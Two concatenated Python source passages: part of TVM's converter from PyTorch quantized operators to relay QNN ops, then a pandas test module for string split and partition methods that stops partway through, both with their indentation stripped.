inp_zero_point = _expr.const(inputs[2])
return relay.qnn.op.dequantize(inputs[0], inp_scale, inp_zero_point)
return _impl
def _get_numpy(relay_const_scalar):
return relay_const_scalar.data.numpy()
def _get_scalar(relay_const_scalar):
return _get_numpy(relay_const_scalar).item(0)
def _do_bias_and_requantize(
output, bias, input_scale, weight_scale, output_scale, output_zero_point, with_relu
):
"""Output processing for conv and linear"""
# this is a vector for per channel case
requant_input_scale = _expr.const(_get_numpy(input_scale) * _get_numpy(weight_scale))
# Torch does bias add and requanize scale in fp32
# refer to third_party/fbgemm/include/fbgemm/OutputProcessing-inl.h
# Instead, we do bias add in int32 and use qnn requantize, which needs
# integer input.
# We observed no loss in accuracy in doing this way, and it is better
# for tvm because bias quantization can be done at compile time
# Instead, the torch way requires rounding of activation at runtime
if bias is not None:
requantize_input = _op.nn.bias_add(output, bias)
else:
requantize_input = output
requantized = relay.qnn.op.requantize(
requantize_input,
requant_input_scale,
relay.const(0, "int32"),
output_scale,
output_zero_point,
out_dtype="int32",
axis=1,
)
clip_min = 0
if with_relu:
clip_min = _get_scalar(output_zero_point)
clip = _op.tensor.clip(requantized, clip_min, 255.0)
return _op.cast(clip, dtype="uint8")
def _quantized_conv2d(with_relu=False):
def _impl(inputs, _):
# refer to src/ATen/native/quantized/cpu/qconv.cpp
# inputs[0]: input tensor
# inputs[1]: (weight, scale, zero_point, bias)
# inputs[2-5]: stride, padding, dilation, groups
# inputs[6]: output_scale
# inputs[7]: output_zero_point
# inputs[8]: input_scale (added manually by frontend)
# inputs[9]: input_zero_point (added manually by frontend)
conv_params = inputs[1]
weight = conv_params[0]
weight_scale = conv_params[1]
weight_zero_point = conv_params[2]
bias = conv_params[3]
if len(conv_params) > 4:
# Torch 1.6 or newer case
strides = conv_params[4]
padding = conv_params[5]
dilation = conv_params[6]
groups = conv_params[7]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
assert len(inputs) == 6, "Input quant params not found in op inputs"
# These are manually added by add_input_quant_params_to_op_inputs above
# In torch, they are retrieved from QTensor data structure at runtime
input_scale = _expr.const(inputs[4])
input_zero_point = _expr.const(inputs[5])
else:
strides = inputs[2]
padding = inputs[3]
dilation = inputs[4]
groups = inputs[5]
output_scale = _expr.const(inputs[6])
output_zero_point = _expr.const(inputs[7])
assert len(inputs) == 10, "Input quant params not found in op inputs"
input_scale = _expr.const(inputs[8])
input_zero_point = _expr.const(inputs[9])
weight_shape = infer_shape(weight)
kernel_size = (weight_shape[2], weight_shape[3])
out_channels = weight_shape[0]
if padding[0] != 0 or padding[1] != 0:
pad_val = _get_scalar(input_zero_point)
inp = _op.nn.pad(
inputs[0],
pad_width=((0, 0), (0, 0), (padding[0], padding[0]), (padding[1], padding[1])),
pad_value=float(pad_val),
)
else:
inp = inputs[0]
# padding is (0, 0) because we did explicit pad op with
# pad value being zero point above
conv_out = relay.qnn.op.conv2d(
inp,
weight,
input_zero_point,
weight_zero_point,
input_scale,
weight_scale,
kernel_size=kernel_size,
dilation=dilation,
strides=strides,
padding=(0, 0),
groups=groups,
channels=out_channels,
)
return _do_bias_and_requantize(
conv_out, bias, input_scale, weight_scale, output_scale, output_zero_point, with_relu
)
return _impl
def _linear(with_relu=False):
# similar to conv
def _impl(inputs, _):
weight = inputs[1][0]
weight_scale = inputs[1][1]
weight_zero_point = inputs[1][2]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
assert len(inputs) == 6, "Input quant params not found in op inputs"
# Manually added by add_input_quant_params_to_op_inputs above
input_scale = _expr.const(inputs[4])
input_zero_point = _expr.const(inputs[5])
weight_shape = infer_shape(weight)
dense = relay.qnn.op.dense(
inputs[0],
weight,
input_zero_point,
weight_zero_point,
input_scale,
weight_scale,
units=weight_shape[0],
)
bias_var = inputs[1][3]
return _do_bias_and_requantize(
dense, bias_var, input_scale, weight_scale, output_scale, output_zero_point, with_relu
)
return _impl
def _binop(relay_op, with_relu=False, fp32_piggy_back=False):
def qnn_impl(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
):
qnn_out = relay_op(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
)
if with_relu:
clip_min = _get_scalar(output_zero_point)
return _op.tensor.clip(qnn_out, clip_min, 255)
return qnn_out
# refer to aten/src/ATen/native/quantized/cpu/{qadd, qmul}.cpp
# they piggy backs to fp32 math by dequantize -> fp32 math -> quantize
def torch_impl(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
):
if isinstance(lhs, _expr.Call) and lhs.op.name == "qnn.quantize":
lhs = lhs.args[0]
else:
lhs = relay.qnn.op.dequantize(lhs, input_scale_lhs, input_zero_point_lhs)
if isinstance(rhs, _expr.Call) and rhs.op.name == "qnn.quantize":
rhs = rhs.args[0]
else:
rhs = relay.qnn.op.dequantize(rhs, input_scale_rhs, input_zero_point_rhs)
fp32_out = relay_op(lhs, rhs)
if with_relu:
fp32_out = _op.nn.relu(fp32_out)
return relay.qnn.op.quantize(
fp32_out, output_scale, output_zero_point, axis=-1, out_dtype="uint8"
)
def _impl(inputs, _):
lhs = inputs[0]
rhs = inputs[1]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
assert len(inputs) == 8, "Input quant params not found in op inputs"
# Manually added by add_input_quant_params_to_op_inputs above
input_scale_lhs = _expr.const(inputs[4])
input_zero_point_lhs = _expr.const(inputs[5])
input_scale_rhs = _expr.const(inputs[6])
input_zero_point_rhs = _expr.const(inputs[7])
if fp32_piggy_back:
logger.info("Piggy backing to FP32 op (PyTorch way)")
return torch_impl(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
)
return qnn_impl(
lhs,
rhs,
input_scale_lhs,
input_zero_point_lhs,
input_scale_rhs,
input_zero_point_rhs,
output_scale,
output_zero_point,
)
return _impl
def _cat(fp32_piggy_back=False):
# refer to aten/src/ATen/native/quantized/cpu/qconcat.cpp
# for concat they also piggy backs to fp32(!)
# dequantize -> fp32 math -> quantize
def torch_impl(inputs, input_scales, input_zero_points, output_scale, output_zero_point, axis):
dequantized = []
for inp, inp_scale, inp_zp in zip(inputs, input_scales, input_zero_points):
dequantized.append(relay.qnn.op.dequantize(inp, inp_scale, inp_zp))
concat = _op.tensor.concatenate(dequantized, axis=axis)
return relay.qnn.op.quantize(
concat, output_scale, output_zero_point, axis=axis, out_dtype="uint8"
)
def _impl(inputs, _):
axis = inputs[1]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
num_inputs = (len(inputs) - 4) // 2
input_scales = []
input_zero_points = []
for i in range(0, num_inputs):
input_scales.append(_expr.const(inputs[4 + i * 2]))
input_zero_points.append(_expr.const(inputs[4 + i * 2 + 1]))
if fp32_piggy_back:
return torch_impl(
inputs[0], input_scales, input_zero_points, output_scale, output_zero_point, axis
)
return relay.qnn.op.concatenate(
inputs[0], input_scales, input_zero_points, output_scale, output_zero_point, axis
)
return _impl
def _add_scalar():
# this is used for mobilenet v3
def _impl(inputs, _):
# refer to aten/src/ATen/native/quantized/cpu/qadd.cpp
assert len(inputs) == 6, "Input quant params not found in op inputs"
s = inputs[4]
z = inputs[5]
c = inputs[1]
c_q = round(c / s)
q_min = 0
q_max = 255
# math for calculating output scale and zp are already done
# during _add_output_quant_params_to_scalar_op above
out_scale = _expr.const(inputs[2])
out_zp = _expr.const(inputs[3])
if q_min > z - c_q or q_max < z - c_q:
# TODO(masahi): Replace this with integer only compute
dequant = relay.qnn.op.dequantize(inputs[0], _expr.const(s), _expr.const(z))
dequantized_add = _op.tensor.add(dequant, _expr.const(c_q * s))
return relay.qnn.op.quantize(
dequantized_add, out_scale, out_zp, axis=1, out_dtype="uint8"
)
# only scale change
return inputs[0]
return _impl
def quantize_scalar(data, scale, zero_point):
# used to quantize 6., in mobilenet v3
transformed = zero_point + data / scale
return max(0, min(round(transformed), 255))
def _relu6():
# refer to src/ATen/native/quantized/cpu/qrelu.cpp
def _impl(inputs, _):
assert len(inputs) == 4, "Input quant params not found in op inputs"
input_scale = inputs[2]
input_zero_point = inputs[3]
six = quantize_scalar(6.0, input_scale, input_zero_point)
return _op.tensor.clip(inputs[0], input_zero_point, six)
return _impl
def _mul_scalar():
# this is used for mobilenet v3
def _impl(inputs, _):
# refer to aten/src/ATen/native/quantized/cpu/qmul.cpp
# math for calculating output scale and zp are already done
# during _add_output_quant_params_to_scalar_op above
assert len(inputs) == 6, "Input quant params not found in op inputs"
other_val = inputs[1] # scalar
if other_val > 0.0:
# only scale change
return inputs[0]
if other_val == 0.0:
shape = infer_shape(inputs[0])
return _op.full(_expr.const(0), shape, dtype="uint8")
# negative scale case
q_min = 0
q_max = 255
bias = _expr.const(q_max + q_min, dtype="int8")
int8 = bias - _op.cast(inputs[0], "int8")
return _op.cast(int8, "uint8")
return _impl
def _hswish():
# refer to src/ATen/native/quantized/cpu/kernels/QuantizedOpKernels.cpp
# They fallback to fp32
def _impl(inputs, _):
assert len(inputs) == 5, "Input quant params not found in op inputs"
# TODO(masahi): Replace this with integer only compute.
# We do not have to strictly follow how PyTorch does it.
def relu6(x):
return _op.tensor.clip(x, 0.0, 6.0)
def hardsigmoid(x):
dtype = "float32"
return relu6(x + _expr.const(3.0, dtype=dtype)) / _expr.const(6.0, dtype=dtype)
output_scale = _expr.const(inputs[1])
output_zero_point = _expr.const(inputs[2])
input_scale = _expr.const(inputs[3])
input_zero_point = _expr.const(inputs[4])
dequant = relay.qnn.op.dequantize(inputs[0], input_scale, input_zero_point, axis=1)
dequantized_hswish = dequant * hardsigmoid(dequant)
return relay.qnn.op.quantize(
dequantized_hswish, output_scale, output_zero_point, out_dtype="uint8"
)
return _impl
def _linear_dynamic():
def _calculate_qparam(inp):
# reference ATen/native/quantized/cpu/qlinear_dynamic.cpp
# ChooseQuantizationParams function
mn = _op.min(inp)
mx = _op.max(inp)
# Ensure that the interval contains 0
mn = _op.minimum(mn, _op.const(0.0, dtype="float32"))
mx = _op.maximum(mx, _op.const(0.0, dtype="float32"))
qmax = 255
# reduce_range became True in v1.6
if is_version_greater_than("1.5.1"):
qmax = 127
scale = (mx - mn) / _expr.const(qmax, dtype="float32")
zero_point_from_min = -(mn / scale)
zero_point = _op.cast(_op.round(_op.clip(zero_point_from_min, 0.0, qmax)), "int32")
return scale, zero_point
def _impl(inputs, _):
weight = inputs[1][0]
weight_scale = inputs[1][1]
weight_zero_point = inputs[1][2]
inp = inputs[0]
input_scale, input_zero_point = _calculate_qparam(inp)
qinp = relay.qnn.op.quantize(inp, input_scale, input_zero_point, out_dtype="uint8")
data_shape = infer_shape(inp)
if len(data_shape) > 2:
qinp = _op.reverse_reshape(qinp, [-1, 0])
weight_shape = infer_shape(weight)
units = weight_shape[0]
dense = relay.qnn.op.dense(
qinp,
weight,
input_zero_point,
weight_zero_point,
input_scale,
weight_scale,
units=units,
)
bias_var = inputs[1][3]
dequant_scale = input_scale * weight_scale
dense_out = relay.qnn.op.dequantize(
dense, dequant_scale, input_zero_point=relay.const(0, "int32"), axis=1
)
if len(data_shape) > 2:
new_shape = list(data_shape[:-1])
new_shape.append(units)
dense_out = _op.reshape(dense_out, new_shape)
if bias_var is not None:
return dense_out + bias_var
return dense_out
return _impl
def _quantized_conv_transpose2d(with_relu=False):
def _impl(inputs, _):
# Refer to aten/src/ATen/native/quantized/cpu/qconv.cpp
# Supported in Torch 1.7 or newer
conv_params = inputs[1]
weight = conv_params[0]
weight_scale = conv_params[1]
weight_zero_point = conv_params[2]
bias = conv_params[3]
strides = conv_params[4]
padding = conv_params[5]
dilation = conv_params[6]
groups = conv_params[7]
output_padding = conv_params[8]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
assert len(inputs) == 6, "Input quant params not found in op inputs"
# These are manually added by add_input_quant_params_to_op_inputs above
# In torch, they are retrieved from QTensor data structure at runtime
input_scale = _expr.const(inputs[4])
input_zero_point = _expr.const(inputs[5])
weight_shape = list(infer_shape(weight))
kernel_size = (weight_shape[2], weight_shape[3])
out_channels = weight_shape[1]
conv_out = relay.qnn.op.conv2d_transpose(
inputs[0],
weight,
input_zero_point,
weight_zero_point,
input_scale,
weight_scale,
kernel_size=kernel_size,
dilation=dilation,
strides=strides,
padding=padding,
groups=groups,
channels=out_channels,
output_padding=output_padding,
out_dtype="int32",
kernel_layout="IOHW",
)
return _do_bias_and_requantize(
conv_out, bias, input_scale, weight_scale, output_scale, output_zero_point, with_relu
)
return _impl
convert_map = {
"aten::quantize_per_tensor": _quantize_per_tensor(),
"quantized::conv2d_relu": _quantized_conv2d(with_relu=True),
"aten::dequantize": _dequantize(),
"quantized::conv2d": _quantized_conv2d(),
"quantized::add_relu": _binop(relay.qnn.op.add, with_relu=True),
"quantized::add": _binop(relay.qnn.op.add),
"quantized::mul_relu": _binop(relay.qnn.op.mul, with_relu=True),
"quantized::mul": _binop(relay.qnn.op.mul),
"quantized::linear": _linear(),
"quantized::linear_relu": _linear(with_relu=True),
"quantized::cat": _cat(),
"quantized::add_scalar": _add_scalar(),
"quantized::mul_scalar": _mul_scalar(),
"quantized::relu6": _relu6(),
"quantized::linear_dynamic": _linear_dynamic(),
"quantized::hardswish": _hswish(),
"quantized::conv_transpose2d": _quantized_conv_transpose2d(),
}
|
|
from datetime import datetime
import re
import numpy as np
import pytest
import pandas as pd
from pandas import (
DataFrame,
Index,
MultiIndex,
Series,
_testing as tm,
)
@pytest.mark.parametrize("method", ["split", "rsplit"])
def test_split(any_string_dtype, method):
values = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"], dtype=any_string_dtype)
result = getattr(values.str, method)("_")
exp = Series([["a", "b", "c"], ["c", "d", "e"], np.nan, ["f", "g", "h"]])
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("method", ["split", "rsplit"])
def test_split_more_than_one_char(any_string_dtype, method):
# more than one char
values = Series(["a__b__c", "c__d__e", np.nan, "f__g__h"], dtype=any_string_dtype)
result = getattr(values.str, method)("__")
exp = Series([["a", "b", "c"], ["c", "d", "e"], np.nan, ["f", "g", "h"]])
tm.assert_series_equal(result, exp)
result = getattr(values.str, method)("__", expand=False)
tm.assert_series_equal(result, exp)
def test_split_more_regex_split(any_string_dtype):
# regex split
values = Series(["a,b_c", "c_d,e", np.nan, "f,g,h"], dtype=any_string_dtype)
result = values.str.split("[,_]")
exp = Series([["a", "b", "c"], ["c", "d", "e"], np.nan, ["f", "g", "h"]])
tm.assert_series_equal(result, exp)
def test_split_regex(any_string_dtype):
# GH 43563
# explicit regex = True split
values = Series("xxxjpgzzz.jpg", dtype=any_string_dtype)
result = values.str.split(r"\.jpg", regex=True)
exp = Series([["xxxjpgzzz", ""]])
tm.assert_series_equal(result, exp)
def test_split_regex_explicit(any_string_dtype):
# explicit regex = True split with compiled regex
regex_pat = re.compile(r".jpg")
values = Series("xxxjpgzzz.jpg", dtype=any_string_dtype)
result = values.str.split(regex_pat)
exp = Series([["xx", "zzz", ""]])
tm.assert_series_equal(result, exp)
# explicit regex = False split
result = values.str.split(r"\.jpg", regex=False)
exp = Series([["xxxjpgzzz.jpg"]])
tm.assert_series_equal(result, exp)
# non explicit regex split, pattern length == 1
result = values.str.split(r".")
exp = Series([["xxxjpgzzz", "jpg"]])
tm.assert_series_equal(result, exp)
# non explicit regex split, pattern length != 1
result = values.str.split(r".jpg")
exp = Series([["xx", "zzz", ""]])
tm.assert_series_equal(result, exp)
# regex=False with pattern compiled regex raises error
with pytest.raises(
ValueError,
match="Cannot use a compiled regex as replacement pattern with regex=False",
):
values.str.split(regex_pat, regex=False)
@pytest.mark.parametrize("expand", [None, False])
@pytest.mark.parametrize("method", ["split", "rsplit"])
def test_split_object_mixed(expand, method):
mixed = Series(["a_b_c", np.nan, "d_e_f", True, datetime.today(), None, 1, 2.0])
result = getattr(mixed.str, method)("_", expand=expand)
exp = Series(
[
["a", "b", "c"],
np.nan,
["d", "e", "f"],
np.nan,
np.nan,
np.nan,
np.nan,
np.nan,
]
)
assert isinstance(result, Series)
tm.assert_almost_equal(result, exp)
@pytest.mark.parametrize("method", ["split", "rsplit"])
@pytest.mark.parametrize("n", [None, 0])
def test_split_n(any_string_dtype, method, n):
s = Series(["a b", pd.NA, "b c"], dtype=any_string_dtype)
expected = Series([["a", "b"], pd.NA, ["b", "c"]])
result = getattr(s.str, method)(" ", n=n)
tm.assert_series_equal(result, expected)
def test_rsplit(any_string_dtype):
# regex split is not supported by rsplit
values = Series(["a,b_c", "c_d,e", np.nan, "f,g,h"], dtype=any_string_dtype)
result = values.str.rsplit("[,_]")
exp = Series([["a,b_c"], ["c_d,e"], np.nan, ["f,g,h"]])
tm.assert_series_equal(result, exp)
def test_rsplit_max_number(any_string_dtype):
# setting max number of splits, make sure it's from reverse
values = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"], dtype=any_string_dtype)
result = values.str.rsplit("_", n=1)
exp = Series([["a_b", "c"], ["c_d", "e"], np.nan, ["f_g", "h"]])
tm.assert_series_equal(result, exp)
def test_split_blank_string(any_string_dtype):
# expand blank split GH 20067
values = Series([""], name="test", dtype=any_string_dtype)
result = values.str.split(expand=True)
exp = DataFrame([[]], dtype=any_string_dtype) # NOTE: this is NOT an empty df
tm.assert_frame_equal(result, exp)
def test_split_blank_string_with_non_empty(any_string_dtype):
values = Series(["a b c", "a b", "", " "], name="test", dtype=any_string_dtype)
result = values.str.split(expand=True)
exp = DataFrame(
[
["a", "b", "c"],
["a", "b", np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
@pytest.mark.parametrize("method", ["split", "rsplit"])
def test_split_noargs(any_string_dtype, method):
# #1859
s = Series(["Wes McKinney", "Travis Oliphant"], dtype=any_string_dtype)
result = getattr(s.str, method)()
expected = ["Travis", "Oliphant"]
assert result[1] == expected
@pytest.mark.parametrize(
"data, pat",
[
(["bd asdf jfg", "kjasdflqw asdfnfk"], None),
(["bd asdf jfg", "kjasdflqw asdfnfk"], "asdf"),
(["bd_asdf_jfg", "kjasdflqw_asdfnfk"], "_"),
],
)
@pytest.mark.parametrize("n", [-1, 0])
def test_split_maxsplit(data, pat, any_string_dtype, n):
# re.split 0, str.split -1
s = Series(data, dtype=any_string_dtype)
result = s.str.split(pat=pat, n=n)
xp = s.str.split(pat=pat)
tm.assert_series_equal(result, xp)
@pytest.mark.parametrize(
"data, pat, expected",
[
(
["split once", "split once too!"],
None,
Series({0: ["split", "once"], 1: ["split", "once too!"]}),
),
(
["split_once", "split_once_too!"],
"_",
Series({0: ["split", "once"], 1: ["split", "once_too!"]}),
),
],
)
def test_split_no_pat_with_nonzero_n(data, pat, expected, any_string_dtype):
s = Series(data, dtype=any_string_dtype)
result = s.str.split(pat=pat, n=1)
tm.assert_series_equal(expected, result, check_index_type=False)
def test_split_to_dataframe_no_splits(any_string_dtype):
s = Series(["nosplit", "alsonosplit"], dtype=any_string_dtype)
result = s.str.split("_", expand=True)
exp = DataFrame({0: Series(["nosplit", "alsonosplit"], dtype=any_string_dtype)})
tm.assert_frame_equal(result, exp)
def test_split_to_dataframe(any_string_dtype):
s = Series(["some_equal_splits", "with_no_nans"], dtype=any_string_dtype)
result = s.str.split("_", expand=True)
exp = DataFrame(
{0: ["some", "with"], 1: ["equal", "no"], 2: ["splits", "nans"]},
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
def test_split_to_dataframe_unequal_splits(any_string_dtype):
s = Series(
["some_unequal_splits", "one_of_these_things_is_not"], dtype=any_string_dtype
)
result = s.str.split("_", expand=True)
exp = DataFrame(
{
0: ["some", "one"],
1: ["unequal", "of"],
2: ["splits", "these"],
3: [np.nan, "things"],
4: [np.nan, "is"],
5: [np.nan, "not"],
},
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
def test_split_to_dataframe_with_index(any_string_dtype):
s = Series(
["some_splits", "with_index"], index=["preserve", "me"], dtype=any_string_dtype
)
result = s.str.split("_", expand=True)
exp = DataFrame(
{0: ["some", "with"], 1: ["splits", "index"]},
index=["preserve", "me"],
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
with pytest.raises(ValueError, match="expand must be"):
s.str.split("_", expand="not_a_boolean")
def test_split_to_multiindex_expand_no_splits():
# https://github.com/pandas-dev/pandas/issues/23677
idx = Index(["nosplit", "alsonosplit", np.nan])
result = idx.str.split("_", expand=True)
exp = idx
tm.assert_index_equal(result, exp)
assert result.nlevels == 1
def test_split_to_multiindex_expand():
idx = Index(["some_equal_splits", "with_no_nans", np.nan, None])
result = idx.str.split("_", expand=True)
exp = MultiIndex.from_tuples(
[
("some", "equal", "splits"),
("with", "no", "nans"),
[np.nan, np.nan, np.nan],
[None, None, None],
]
)
tm.assert_index_equal(result, exp)
assert result.nlevels == 3
def test_split_to_multiindex_expand_unequal_splits():
idx = Index(["some_unequal_splits", "one_of_these_things_is_not", np.nan, None])
result = idx.str.split("_", expand=True)
exp = MultiIndex.from_tuples(
[
("some", "unequal", "splits", np.nan, np.nan, np.nan),
("one", "of", "these", "things", "is", "not"),
(np.nan, np.nan, np.nan, np.nan, np.nan, np.nan),
(None, None, None, None, None, None),
]
)
tm.assert_index_equal(result, exp)
assert result.nlevels == 6
with pytest.raises(ValueError, match="expand must be"):
idx.str.split("_", expand="not_a_boolean")
def test_rsplit_to_dataframe_expand_no_splits(any_string_dtype):
s = Series(["nosplit", "alsonosplit"], dtype=any_string_dtype)
result = s.str.rsplit("_", expand=True)
exp = DataFrame({0: Series(["nosplit", "alsonosplit"])}, dtype=any_string_dtype)
tm.assert_frame_equal(result, exp)
def test_rsplit_to_dataframe_expand(any_string_dtype):
s = Series(["some_equal_splits", "with_no_nans"], dtype=any_string_dtype)
result = s.str.rsplit("_", expand=True)
exp = DataFrame(
{0: ["some", "with"], 1: ["equal", "no"], 2: ["splits", "nans"]},
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
result = s.str.rsplit("_", expand=True, n=2)
exp = DataFrame(
{0: ["some", "with"], 1: ["equal", "no"], 2: ["splits", "nans"]},
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
result = s.str.rsplit("_", expand=True, n=1)
exp = DataFrame(
{0: ["some_equal", "with_no"], 1: ["splits", "nans"]}, dtype=any_string_dtype
)
tm.assert_frame_equal(result, exp)
def test_rsplit_to_dataframe_expand_with_index(any_string_dtype):
s = Series(
["some_splits", "with_index"], index=["preserve", "me"], dtype=any_string_dtype
)
result = s.str.rsplit("_", expand=True)
exp = DataFrame(
{0: ["some", "with"], 1: ["splits", "index"]},
index=["preserve", "me"],
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, exp)
def test_rsplit_to_multiindex_expand_no_split():
idx = Index(["nosplit", "alsonosplit"])
result = idx.str.rsplit("_", expand=True)
exp = idx
tm.assert_index_equal(result, exp)
assert result.nlevels == 1
def test_rsplit_to_multiindex_expand():
idx = Index(["some_equal_splits", "with_no_nans"])
result = idx.str.rsplit("_", expand=True)
exp = MultiIndex.from_tuples([("some", "equal", "splits"), ("with", "no", "nans")])
tm.assert_index_equal(result, exp)
assert result.nlevels == 3
def test_rsplit_to_multiindex_expand_n():
idx = Index(["some_equal_splits", "with_no_nans"])
result = idx.str.rsplit("_", expand=True, n=1)
exp = MultiIndex.from_tuples([("some_equal", "splits"), ("with_no", "nans")])
tm.assert_index_equal(result, exp)
assert result.nlevels == 2
def test_split_nan_expand(any_string_dtype):
# gh-18450
s = Series(["foo,bar,baz", np.nan], dtype=any_string_dtype)
result = s.str.split(",", expand=True)
exp = DataFrame(
[["foo", "bar", "baz"], [np.nan, np.nan, np.nan]], dtype=any_string_dtype
)
tm.assert_frame_equal(result, exp)
# check that these are actually np.nan/pd.NA and not None
# TODO see GH 18463
# tm.assert_frame_equal does not differentiate
if any_string_dtype == "object":
assert all(np.isnan(x) for x in result.iloc[1])
else:
assert all(x is pd.NA for x in result.iloc[1])
def test_split_with_name_series(any_string_dtype):
# GH 12617
# should preserve name
s = Series(["a,b", "c,d"], name="xxx", dtype=any_string_dtype)
res = s.str.split(",")
exp = Series([["a", "b"], ["c", "d"]], name="xxx")
tm.assert_series_equal(res, exp)
res = s.str.split(",", expand=True)
exp = DataFrame([["a", "b"], ["c", "d"]], dtype=any_string_dtype)
tm.assert_frame_equal(res, exp)
def test_split_with_name_index():
# GH 12617
idx = Index(["a,b", "c,d"], name="xxx")
res = idx.str.split(",")
exp = Index([["a", "b"], ["c", "d"]], name="xxx")
assert res.nlevels == 1
tm.assert_index_equal(res, exp)
res = idx.str.split(",", expand=True)
exp = MultiIndex.from_tuples([("a", "b"), ("c", "d")])
assert res.nlevels == 2
tm.assert_index_equal(res, exp)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
[
("a", "__", "b__c"),
("c", "__", "d__e"),
np.nan,
("f", "__", "g__h"),
None,
],
],
[
"rpartition",
[
("a__b", "__", "c"),
("c__d", "__", "e"),
np.nan,
("f__g", "__", "h"),
None,
],
],
],
)
def test_partition_series_more_than_one_char(method, exp, any_string_dtype):
# https://github.com/pandas-dev/pandas/issues/23558
# more than one char
s = Series(["a__b__c", "c__d__e", np.nan, "f__g__h", None], dtype=any_string_dtype)
result = getattr(s.str, method)("__", expand=False)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
[("a", " ", "b c"), ("c", " ", "d e"), np.nan, ("f", " ", "g h"), None],
],
[
"rpartition",
[("a b", " ", "c"), ("c d", " ", "e"), np.nan, ("f g", " ", "h"), None],
],
],
)
def test_partition_series_none(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
# None
s = Series(["a b c", "c d e", np.nan, "f g h", None], dtype=any_string_dtype)
result = getattr(s.str, method)(expand=False)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
[("abc", "", ""), ("cde", "", ""), np.nan, ("fgh", "", ""), None],
],
[
"rpartition",
[("", "", "abc"), ("", "", "cde"), np.nan, ("", "", "fgh"), None],
],
],
)
def test_partition_series_not_split(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
# Not split
s = Series(["abc", "cde", np.nan, "fgh", None], dtype=any_string_dtype)
result = getattr(s.str, method)("_", expand=False)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
[("a", "_", "b_c"), ("c", "_", "d_e"), np.nan, ("f", "_", "g_h")],
],
[
"rpartition",
[("a_b", "_", "c"), ("c_d", "_", "e"), np.nan, ("f_g", "_", "h")],
],
],
)
def test_partition_series_unicode(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
# unicode
s = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"], dtype=any_string_dtype)
result = getattr(s.str, method)("_", expand=False)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("method", ["partition", "rpartition"])
def test_partition_series_stdlib(any_string_dtype, method):
# https://github.com/pandas-dev/pandas/issues/23558
# compare to standard lib
s = Series(["A_B_C", "B_C_D", "E_F_G", "EFGHEF"], dtype=any_string_dtype)
result = getattr(s.str, method)("_", expand=False).tolist()
assert result == [getattr(v, method)("_") for v in s]
@pytest.mark.parametrize(
"method, expand, exp, exp_levels",
[
[
"partition",
False,
np.array(
[("a", "_", "b_c"), ("c", "_", "d_e"), ("f", "_", "g_h"), np.nan, None],
dtype=object,
),
1,
],
[
"rpartition",
False,
np.array(
[("a_b", "_", "c"), ("c_d", "_", "e"), ("f_g", "_", "h"), np.nan, None],
dtype=object,
),
1,
],
],
)
def test_partition_index(method, expand, exp, exp_levels):
# https://github.com/pandas-dev/pandas/issues/23558
values = Index(["a_b_c", "c_d_e", "f_g_h", np.nan, None])
result = getattr(values.str, method)("_", expand=expand)
exp = Index(exp)
tm.assert_index_equal(result, exp)
assert result.nlevels == exp_levels
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
{
0: ["a", "c", np.nan, "f", None],
1: ["_", "_", np.nan, "_", None],
2: ["b_c", "d_e", np.nan, "g_h", None],
},
],
[
"rpartition",
{
0: ["a_b", "c_d", np.nan, "f_g", None],
1: ["_", "_", np.nan, "_", None],
2: ["c", "e", np.nan, "h", None],
},
],
],
)
def test_partition_to_dataframe(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
s = Series(["a_b_c", "c_d_e", np.nan, "f_g_h", None], dtype=any_string_dtype)
result = getattr(s.str, method)("_")
expected = DataFrame(
exp,
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"method, exp",
[
[
"partition",
{
0: ["a", "c", np.nan, "f", None],
1: ["_", "_", np.nan, "_", None],
2: ["b_c", "d_e", np.nan, "g_h", None],
},
],
[
"rpartition",
{
0: ["a_b", "c_d", np.nan, "f_g", None],
1: ["_", "_", np.nan, "_", None],
2: ["c", "e", np.nan, "h", None],
},
],
],
)
def test_partition_to_dataframe_from_series(any_string_dtype, method, exp):
# https://github.com/pandas-dev/pandas/issues/23558
s = Series(["a_b_c", "c_d_e", np.nan, "f_g_h", None], dtype=any_string_dtype)
result = getattr(s.str, method)("_", expand=True)
expected = DataFrame(
exp,
dtype=any_string_dtype,
)
tm.assert_frame_equal(result, expected)
def test_partition_with_name(any_string_dtype):
# GH 12617
